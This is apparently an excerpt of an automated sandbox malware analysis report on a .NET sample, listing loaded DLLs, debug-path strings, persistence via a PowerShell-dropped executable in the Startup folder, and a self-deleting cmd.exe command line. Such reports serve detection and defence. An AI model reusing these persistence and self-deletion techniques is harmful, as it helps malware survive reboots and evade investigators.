            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: upXUt2jZ0S.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: upXUt2jZ0S.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: Microsoft.VisualBasic.pdbL0Tw# source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbi source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbGq source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.pdbPY4& source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdbN source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdbd source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.Configuration.ni.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.PDB source: .exe, 0000000A.00000002.1795968848.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.Xml.pdbd source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.Configuration.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.Xml.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbn^ source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.Core.ni.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: upXUt2jZ0S.exe, 00000000.00000002.2592580416.0000000003181000.00000004.00000800.00020000.00000000.sdmp, .exe, 00000007.00000002.2610356599.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, .exe, 00000007.00000002.2594797460.0000000002D11000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: %%.pdb source: .exe, 0000000A.00000002.1795968848.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.PDBl source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.ni.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER65D3.tmp.dmp.16.dr
            Source: upXUt2jZ0S.exeStatic PE information: 0x81AF2B24 [Sun Dec 12 04:25:08 2038 UTC]
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 0_2_065076D0 pushad ; ret 0_2_065076D1
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 0_2_06500013 push es; retf 0_2_0650001C
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 0_2_06508C20 pushad ; iretd 0_2_06508C21
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 0_2_06508C22 push esp; iretd 0_2_06508C29
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 0_2_0650F8A0 pushfd ; iretd 0_2_0650F8A1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 7_2_072676D0 pushad ; ret 7_2_072676D1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 7_2_07268C20 pushad ; iretd 7_2_07268C21
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04706BA8 push 90081B79h; ret 8_2_04706E75
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 10_2_013724B9 push 8BFFFFFFh; retf 10_2_013724BF
            Source: upXUt2jZ0S.exeStatic PE information: section name: .text entropy: 7.347382019818626
            Source: .exe.2.drStatic PE information: section name: .text entropy: 7.347382019818626

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe\:Zone.Identifier:$DATAJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess created: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\upXUt2jZ0S.exe"
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess created: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\upXUt2jZ0S.exe"Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
